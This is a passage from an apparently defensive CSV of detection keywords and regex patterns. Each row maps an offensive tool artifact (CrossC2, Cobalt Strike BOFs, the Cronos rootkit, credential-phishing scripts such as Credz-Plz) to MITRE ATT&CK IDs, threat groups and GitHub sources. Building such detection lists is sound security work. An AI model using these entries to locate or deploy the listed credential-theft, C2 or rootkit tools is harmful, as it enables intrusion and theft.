DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","8","","N/A","","","","39064" "*CredsLeaker*",".{0,1000}CredsLeaker.{0,1000}","offensive_tool_keyword","CredsLeaker","This script used to display a powershell credentials box asked the user for 
credentials. However. That was highly noticeable. Now its time to utilize Windows Security popup!","T1087 - T1056 - T1003 - T1059 - T1110","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/Dviros/CredsLeaker","1","1","N/A","N/A","N/A","4","316","68","2021-03-31T11:49:57Z","2018-03-05T07:53:31Z","39065" "*CredsPhish.ps1*",".{0,1000}CredsPhish\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","39066" "*Credz-Plz.ps1*",".{0,1000}Credz\-Plz\.ps1.{0,1000}","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","39067" "*Credz-Plz-Execute.txt*",".{0,1000}Credz\-Plz\-Execute\.txt.{0,1000}","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","39068" "*cribdragg3r/Alaris*",".{0,1000}cribdragg3r\/Alaris.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","N/A","10","10","903","142","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z","39069" "*crimeware*/zeus.profile*",".{0,1000}crimeware.{0,1000}\/zeus\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","39070" "*crisis_monitor start*",".{0,1000}crisis_monitor\sstart.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - 
T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","39071" "*crisis_monitor stop*",".{0,1000}crisis_monitor\sstop.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","39072" "*crisprss/PrintSpoofer*",".{0,1000}crisprss\/PrintSpoofer.{0,1000}","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - 
CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","N/A","10","10","88","12","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z","39073" "*crk_get_key1*",".{0,1000}crk_get_key1.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","39074" "*crk_get_key2*",".{0,1000}crk_get_key2.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","39075" "*crk_max_keys_per_crypt*",".{0,1000}crk_max_keys_per_crypt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","39076" "*crk_methods.*",".{0,1000}crk_methods\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","39077" "*crk_password_loop*",".{0,1000}crk_password_loop.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","39078" "*cron_priv_esc(payload*",".{0,1000}cron_priv_esc\(payload.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","39081" "*Cronos Rootkit.*",".{0,1000}Cronos\sRootkit\..{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","39082" "*CronosDebugger.*",".{0,1000}CronosDebugger\..{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. 
protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","39083" "*CronosRootkit.*",".{0,1000}CronosRootkit\..{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","39084" "*CrontabPersistence.json*",".{0,1000}CrontabPersistence\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","39086" "*CroodSolutions/AutoPwnKey*",".{0,1000}CroodSolutions\/AutoPwnKey.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","39087" "*crop.exe \\*\*.lnk \\*\harvest \\*\harvest*",".{0,1000}crop\.exe\s\\\\.{0,1000}\\.{0,1000}\.lnk\s\\\\.{0,1000}\\harvest\s\\\\.{0,1000}\\harvest.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a 
project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","39088" "*cross_s4u.c*",".{0,1000}cross_s4u\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","39089" "*cross_s4u.x64.o*",".{0,1000}cross_s4u\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","39090" "*CrossC2 beacon*",".{0,1000}CrossC2\sbeacon.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's 
cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39091" "*crossc2 dyn load*",".{0,1000}crossc2\sdyn\sload.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39092" "*CrossC2 
framework*",".{0,1000}CrossC2\sframework.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39093" "*CrossC2.cna*",".{0,1000}CrossC2\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39094" "*CrossC2.cna*",".{0,1000}CrossC2\.cna.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39095" "*CrossC2.git*",".{0,1000}CrossC2\.git.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39096" "*CrossC2.Linux*",".{0,1000}CrossC2\.Linux.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","#linux","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39097" "*CrossC2.MacOS*",".{0,1000}CrossC2\.MacOS.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39098" "*CrossC2.Win*",".{0,1000}CrossC2\.Win.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39099" 
"*CrossC2_dev_*",".{0,1000}CrossC2_dev_.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39100" "*crossc2_entry*",".{0,1000}crossc2_entry.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39101" "*crossc2_portscan.*",".{0,1000}crossc2_portscan\..{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","39102" 
